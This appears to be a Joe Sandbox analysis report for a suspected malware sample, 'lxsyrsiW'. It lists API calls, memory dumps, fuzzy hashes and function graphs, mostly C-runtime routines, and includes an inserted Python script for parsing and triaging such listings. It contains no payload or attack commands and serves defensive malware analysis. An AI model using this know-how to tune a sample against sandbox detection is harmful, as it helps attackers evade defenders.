                                                                                                                • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                Control-flow Graph
                                                                                                                control_flow_graph 1495 10005d20 1496 10005d22 1495->1496 1497 10005d26-10005d2d 1495->1497 1496->1497 1498 10005d24 1496->1498 1499 10005d36-10005d37 1497->1499 1500 10005d2f 1497->1500 1498->1497 1502 10005d39-10005d42 VirtualAlloc 1499->1502 1503 10005d5d 1499->1503 1500->1499 1501 10005d30-10005d31 1500->1501 1504 10005d33-10005d35 1501->1504 1502->1504 1505 10005d44 1502->1505 1506 10005d64 1503->1506 1507 10005d5f 1503->1507 1504->1499 1505->1504 1510 10005d46-10005d50 1505->1510 1508 10005d66 1506->1508 1509 10005d69-10005d73 VirtualFree 1506->1509 1507->1506 1511 10005d61 1507->1511 1508->1509 1512 10005d68 1508->1512 1513 10005d52 1510->1513 1514 10005d54-10005d5b 1510->1514 1511->1506 1515 10005d63 1511->1515 1512->1509 1513->1514 1514->1503 1514->1506 1515->1506
                                                                                                                APIs
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 10005D6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 3ebe32634cebc0e6ba28336f4acad1c9254ce2d227efa467861c6f6b5a69768f
                                                                                                                • Instruction ID: 10f37380cb21cafac1f15da1ce1ba0c7b9493c247f18e36487c97ec66e7685fb
                                                                                                                • Opcode Fuzzy Hash: 3ebe32634cebc0e6ba28336f4acad1c9254ce2d227efa467861c6f6b5a69768f
                                                                                                                • Instruction Fuzzy Hash: 1FF0B464E04381AAFBFAC360DD9DB633AE0D7036EBF4A4447E141590BED5675D41C102
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3f0270750c9285815a7f873a12642cee778a57825cbed459cc1f52dbb632ba1e
                                                                                                                • Instruction ID: f5d173d4cae944e8ad377c523d4776d1fd4076796be255565f4cde4383f34985
                                                                                                                • Opcode Fuzzy Hash: 3f0270750c9285815a7f873a12642cee778a57825cbed459cc1f52dbb632ba1e
                                                                                                                • Instruction Fuzzy Hash: 0331C670D0C3828AF351CA64CC4436A7AF3EB8E2E0F75859AD5858B19ED63A8D048752
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE ref: 1000608C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 7b4e4ca92de925539c70dd9292a21fe46a6dd467e51982ba35b9f1b7c8ce00b4
                                                                                                                • Instruction ID: 43ca6a973a732ecce98daaa1a25a42009db911c9e78af6c4eab94d1d62504c44
                                                                                                                • Opcode Fuzzy Hash: 7b4e4ca92de925539c70dd9292a21fe46a6dd467e51982ba35b9f1b7c8ce00b4
                                                                                                                • Instruction Fuzzy Hash: 0501D671C4D3829EF351CB208C002677BF6EF4F2D0F2A869AE5819B0AAD6348D04C752

                                                                                                                 Control-flow Graph (interactive graph not reproduced): function 4013ff-401452; calls 401358, 40108c, 4013b4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 4108700736-0
                                                                                                                • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10041459
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 10041463
                                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 10041470
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                • String ID:
                                                                                                                • API String ID: 3906539128-0
                                                                                                                • Opcode ID: 0c706e3b66ba7a101db3cd53c9592b531c508e952705ec37707bb99f91540c14
                                                                                                                • Instruction ID: c22336146ae1c50ddd8084a0a2d72aac50352fc94dd7634e4dedba4d2f482ad5
                                                                                                                • Opcode Fuzzy Hash: 0c706e3b66ba7a101db3cd53c9592b531c508e952705ec37707bb99f91540c14
                                                                                                                • Instruction Fuzzy Hash: 8C31D4749012289BCB61DF64DD887CDBBB8EF08310F6041EAE40DA7250EB709F858F49
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,10043F13,00000003,1005DE80,0000000C,1004403D,00000003,00000002,00000000,?,10042038,00000003), ref: 10043F5E
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,10043F13,00000003,1005DE80,0000000C,1004403D,00000003,00000002,00000000,?,10042038,00000003), ref: 10043F65
                                                                                                                • ExitProcess.KERNEL32 ref: 10043F77
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: d901a480580f88cf6ed5e805247d5d7d9e09585f2d2463ed2164aa06e86e4e00
                                                                                                                • Instruction ID: 5735ef3b7e6fef01be9c5a23706bffba73639f9e7f092aed6f7edf70567c3a50
                                                                                                                • Opcode Fuzzy Hash: d901a480580f88cf6ed5e805247d5d7d9e09585f2d2463ed2164aa06e86e4e00
                                                                                                                • Instruction Fuzzy Hash: 9FE04631804948AFDF01AF68CE49A483B7AFB46382F118034F905DA032CB35ED82CA88
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                • Instruction ID: 9dce6d6b8b05ab0a555f06944759f9cc391f65fca432f5fc4cfe5cd17794a38a
                                                                                                                • Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
                                                                                                                • Instruction Fuzzy Hash: 9631F3329052446ACF32A96C5C146F77B64AB62BB0F1C45F7E44C86792DB2C8C4DC2BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000008.00000001.2182881289.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000008.00000001.2182881289.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                • Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
                                                                                                                • Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                • Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                 Control-flow Graph (interactive graph not reproduced): function 100424ff-10042648; calls 10042672, 10042096, 10043073, 10043171
                                                                                                                APIs
                                                                                                                • ___free_lconv_mon.LIBCMT ref: 10042543
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043090
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430A2
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430B4
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430C6
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430D8
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430EA
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 100430FC
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 1004310E
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043120
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043132
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043144
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043156
                                                                                                                  • Part of subcall function 10043073: _free.LIBCMT ref: 10043168
                                                                                                                • _free.LIBCMT ref: 10042538
                                                                                                                  • Part of subcall function 10042096: HeapFree.KERNEL32(00000000,00000000,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?), ref: 100420AC
                                                                                                                  • Part of subcall function 10042096: GetLastError.KERNEL32(?,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?,?), ref: 100420BE
                                                                                                                • _free.LIBCMT ref: 1004255A
                                                                                                                • _free.LIBCMT ref: 1004256F
                                                                                                                • _free.LIBCMT ref: 1004257A
                                                                                                                • _free.LIBCMT ref: 1004259C
                                                                                                                • _free.LIBCMT ref: 100425AF
                                                                                                                • _free.LIBCMT ref: 100425BD
                                                                                                                • _free.LIBCMT ref: 100425C8
                                                                                                                • _free.LIBCMT ref: 10042600
                                                                                                                • _free.LIBCMT ref: 10042607
                                                                                                                • _free.LIBCMT ref: 10042624
                                                                                                                • _free.LIBCMT ref: 1004263C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                • String ID:
                                                                                                                • API String ID: 161543041-0
                                                                                                                • Opcode ID: eb483edfe315963564988db57b243b2e66e910094b7b3801ac9d68e49e928187
                                                                                                                • Instruction ID: 80d4f76ae52979dc855e83d83be597b6f0f833f5ce5778967f8c048775cc22ba
                                                                                                                • Opcode Fuzzy Hash: eb483edfe315963564988db57b243b2e66e910094b7b3801ac9d68e49e928187
                                                                                                                • Instruction Fuzzy Hash: 7F313BB1B007019BEB21DA34D845B56B3E9FF00291FB14439E45AD7152DE71FD90CB28

                                                                                                                 Control-flow Graph (interactive graph not reproduced): function 10041a1b-10041c32; RtlDecodePointer at 10041a38-10041a46; calls 10044c0d, 100415d3
                                                                                                                APIs
                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 10041A3E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecodePointer
                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                • Opcode ID: 1639ca3591a54545d13dce2ff40711b127de3502d7f4a8cfba1bd329ff851959
                                                                                                                • Instruction ID: 496ffa460dd9b2aa12352d540c64a8b2ca119fd6790351c66ebdc72429a88fe2
                                                                                                                • Opcode Fuzzy Hash: 1639ca3591a54545d13dce2ff40711b127de3502d7f4a8cfba1bd329ff851959
                                                                                                                • Instruction Fuzzy Hash: 2D514970A01A0ADBDB00DFA4EA881EDBBB1FF49350F7141A5E881E7254DB758D24CB9D
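The blocks above follow one fixed layout (APIs with call-site refs and "Part of subcall function" lines, a Memory Dump Source with Offset and "based on PE", then Similarity IDs). The script below is an added example for triaging such a listing; it is not Joe Sandbox code and not part of this report. SAMPLE is abridged from blocks on this page (argument lists shortened). The two CRT_PATTERNS labels are analyst knowledge about the MSVC runtime, not something the report states: IsDebuggerPresent followed by SetUnhandledExceptionFilter and UnhandledExceptionFilter is the CRT's __raise_securityfailure reporting path, and GetCurrentProcess, TerminateProcess, ExitProcess is its _exit path, so neither by itself is evidence of sample logic such as an anti-debug check.

```python
"""Parse Joe Sandbox per-function blocks (APIs / Memory Dump Source /
Similarity entries) into records and separate CRT boilerplate from
functions that call Win32 directly. Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # call-site address from the "ref:" field
    subcall_of: Optional[str] = None  # set for "Part of subcall function X:" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    offset: str = ""
    based_on_pe: Optional[bool] = None
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""

API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.+)$")
SOURCE_RE = re.compile(r"^Source File:\s*(?P<file>\S+), Offset:\s*(?P<off>[0-9A-Fa-f]+), "
                       r"based on PE:\s*(?P<pe>true|false)$")
FIELDS = (("API ID:", "api_id"), ("String ID:", "string_id"), ("Opcode ID:", "opcode_id"))

def parse_blocks(text: str) -> List[FunctionRecord]:
    """One record per block; 'Instruction Fuzzy Hash' is a block's last line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line.startswith("Instruction Fuzzy Hash"):
            records.append(cur)
            cur = FunctionRecord()
            continue
        parent = None
        sub = SUBCALL_RE.match(line)
        if sub:                                   # keep the parent address, parse the rest
            parent, line = sub["fn"], sub["rest"]
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], parent))
            continue
        m = SOURCE_RE.match(line)
        if m:
            cur.source_file, cur.offset = m["file"], m["off"]
            cur.based_on_pe = m["pe"] == "true"
            continue
        for label, attr in FIELDS:
            if line.startswith(label):
                setattr(cur, attr, line[len(label):].strip())
    if cur.apis or cur.source_file:               # tolerate a truncated final block
        records.append(cur)
    return records

# Analyst knowledge, not stated by the report: these direct-call sequences are
# MSVC CRT internals, so a match is runtime boilerplate rather than sample logic.
CRT_PATTERNS = {
    "crt:__raise_securityfailure": ("IsDebuggerPresent", "SetUnhandledExceptionFilter",
                                    "UnhandledExceptionFilter"),
    "crt:_exit": ("GetCurrentProcess", "TerminateProcess", "ExitProcess"),
}

def classify(rec: FunctionRecord) -> str:
    direct = [a for a in rec.apis if a.subcall_of is None]   # ignore subcall lines
    names = tuple(a.name for a in direct)
    for label, pattern in CRT_PATTERNS.items():
        if names == pattern:
            return label
    if direct and all(a.module == "LIBCMT" for a in direct):
        return "crt:internal"
    if direct:
        return "win32"
    return "no-direct-apis"

def summarize(records):
    """Direct non-CRT API names per memory-dump region, for a quick triage view."""
    out = {}
    for rec in records:
        names = {a.name for a in rec.apis if a.subcall_of is None and a.module != "LIBCMT"}
        out.setdefault(rec.source_file, set()).update(names)
    return out

# Constructed input: four blocks abridged from this report (argument lists shortened).
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10041459
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 10041463
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 10041470
Memory Dump Source
• Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• Instruction Fuzzy Hash: 8C31D4749012289BCB61DF64DD887CDBBB8EF08310F6041EAE40DA7250EB709F858F49
APIs
• GetCurrentProcess.KERNEL32(00000003,?,10043F13,00000003), ref: 10043F5E
• TerminateProcess.KERNEL32(00000000,?,10043F13,00000003), ref: 10043F65
• ExitProcess.KERNEL32 ref: 10043F77
• Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
• Instruction Fuzzy Hash: 9FE04631804948AFDF01AF68CE49A483B7AFB46382F118034F905DA032CB35ED82CA88
APIs
• _free.LIBCMT ref: 10042538
  • Part of subcall function 10042096: HeapFree.KERNEL32(00000000,00000000,?,10043208), ref: 100420AC
• Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
• Instruction Fuzzy Hash: 7F313BB1B007019BEB21DA34D845B56B3E9FF00291FB14439E45AD7152DE71FD90CB28
• Source File: 00000008.00000001.2182881289.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: memset$EntryPointfopenstrcmpstrcpy
• Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58
"""

if __name__ == "__main__":
    for rec in parse_blocks(SAMPLE):
        print(rec.offset, rec.based_on_pe, classify(rec), [a.name for a in rec.apis])
```

classify() looks only at direct calls: the "Part of subcall function" lines are retained with their parent address but excluded, so a CRT helper such as _free reaching HeapFree does not mark the caller as Win32-touching. summarize() keyed by Source File separates the image at offset 00400000 ("based on PE: true") from the unidentified region at 10000000, which is the first split an analyst wants when paging through a listing like this one.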

                                                                                                                 Control-flow Graph (interactive graph not reproduced): function 10047b9c-10047d4e; GetConsoleCP at 10047b9c-10047bf9, WideCharToMultiByte at 10047c85-10047ca5, WriteFile at 10047cab-10047cc1 and 10047cdc-10047cfa, GetLastError at 10047d34-10047d3a; calls 10044c0d, 1004304d, 10047937
                                                                                                                APIs
                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10048311,?,00000000,?,00000000,00000000), ref: 10047BDE
                                                                                                                • __fassign.LIBCMT ref: 10047C59
                                                                                                                • __fassign.LIBCMT ref: 10047C74
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10047C9A
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,10048311,00000000,?,?,?,?,?,?,?,?,?,10048311,?), ref: 10047CB9
                                                                                                                • WriteFile.KERNEL32(?,?,00000001,10048311,00000000,?,?,?,?,?,?,?,?,?,10048311,?), ref: 10047CF2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1324828854-0
                                                                                                                • Opcode ID: dcd95d2b4e03d47bbff43478d85e059036efca89b2c4bb4c1e5dbd75402f611f
                                                                                                                • Instruction ID: f2816552115443c7229bfc077955cc8e048ca3a97d87d7fdeeb7cf75c4f0abcf
                                                                                                                • Opcode Fuzzy Hash: dcd95d2b4e03d47bbff43478d85e059036efca89b2c4bb4c1e5dbd75402f611f
                                                                                                                • Instruction Fuzzy Hash: E151EB70D002459FDB10CFA4CC85AEEBBF5FF09300F24456AE959E7291D770A951CBA5

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100431DA: _free.LIBCMT ref: 10043203
                                                                                                                • _free.LIBCMT ref: 10043264
                                                                                                                  • Part of subcall function 10042096: HeapFree.KERNEL32(00000000,00000000,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?), ref: 100420AC
                                                                                                                  • Part of subcall function 10042096: GetLastError.KERNEL32(?,?,10043208,?,00000000,?,00000000,?,1004322F,?,00000007,?,?,10042697,?,?), ref: 100420BE
                                                                                                                • _free.LIBCMT ref: 1004326F
                                                                                                                • _free.LIBCMT ref: 1004327A
                                                                                                                • _free.LIBCMT ref: 100432CE
                                                                                                                • _free.LIBCMT ref: 100432D9
                                                                                                                • _free.LIBCMT ref: 100432E4
                                                                                                                • _free.LIBCMT ref: 100432EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                • Instruction ID: de2e8023f7193a4c2a5ffe9969e1dc1f932c9f33873d0de85b413c360879defd
                                                                                                                • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                • Instruction Fuzzy Hash: 90112E76A40B04AAD630EBB0CC07FCB77DCEF45710F909836BA9EE6063DA75B5448658

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph: function entry 100444e9 (graph rendering and executed/not-executed colouring not preserved in text; the API calls it makes are listed under APIs below)
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,1004473A,?,?,00000000), ref: 10044543
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,1004473A,?,?,00000000,?,?,?), ref: 100445C9
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100446C3
                                                                                                                • __freea.LIBCMT ref: 100446D0
                                                                                                                  • Part of subcall function 100432FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 1004332C
                                                                                                                • __freea.LIBCMT ref: 100446D9
                                                                                                                • __freea.LIBCMT ref: 100446FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1414292761-0
                                                                                                                • Opcode ID: cb6e73521219ac1604200574bf9ea775aca78d226025bf774f37d35ceb54ce96
                                                                                                                • Instruction ID: 0c83146eb8352b41d9e4e6cd2498997cea625c79840de532b16061f18187481b
                                                                                                                • Opcode Fuzzy Hash: cb6e73521219ac1604200574bf9ea775aca78d226025bf774f37d35ceb54ce96
                                                                                                                • Instruction Fuzzy Hash: 1651BFB2A00616ABEB15CE64CC81EAF77A9EB45690F374638FC04D7190EF74EC90C659

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph: function entry 1004185b (graph rendering and executed/not-executed colouring not preserved in text; GetLastError and SetLastError are called along its paths)
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3160817290-0
                                                                                                                • Opcode ID: 426a1b214f449fbabe24d79378952f512cb14b6f799e9beb475b7c955572f610
                                                                                                                • Instruction ID: f202c0acdb81aa64a5eae758d42c08751bfe1b6fdc2620f7feb9e63caca283c5
                                                                                                                • Opcode Fuzzy Hash: 426a1b214f449fbabe24d79378952f512cb14b6f799e9beb475b7c955572f610
                                                                                                                • Instruction Fuzzy Hash: DDF0CD3A7006117BE311D7355D46EAB16DADFC27A1F71013DF914E2192FF659C42411C
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10043F73,00000003,?,10043F13,00000003,1005DE80,0000000C,1004403D,00000003,00000002), ref: 10043FE2
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10043FF5
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10043F73,00000003,?,10043F13,00000003,1005DE80,0000000C,1004403D,00000003,00000002,00000000), ref: 10044018
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000001.2182881289.0000000010000000.00000040.00000001.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_1_10000000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 517e1f112879d4fb75ed8d696a5f771f380b911c2c6cfb392c0c0a3e770559a1
                                                                                                                • Instruction ID: 4fe64a5819f759115b05a1def77681a479560721cc04137916b3a3784b8cf7e2
                                                                                                                • Opcode Fuzzy Hash: 517e1f112879d4fb75ed8d696a5f771f380b911c2c6cfb392c0c0a3e770559a1
                                                                                                                • Instruction Fuzzy Hash: 0AF0C230900128BBEB11DF90CD49BAEBFB9EF45351F110068F905E2160CF749E84DB98
                                                                                                                APIs
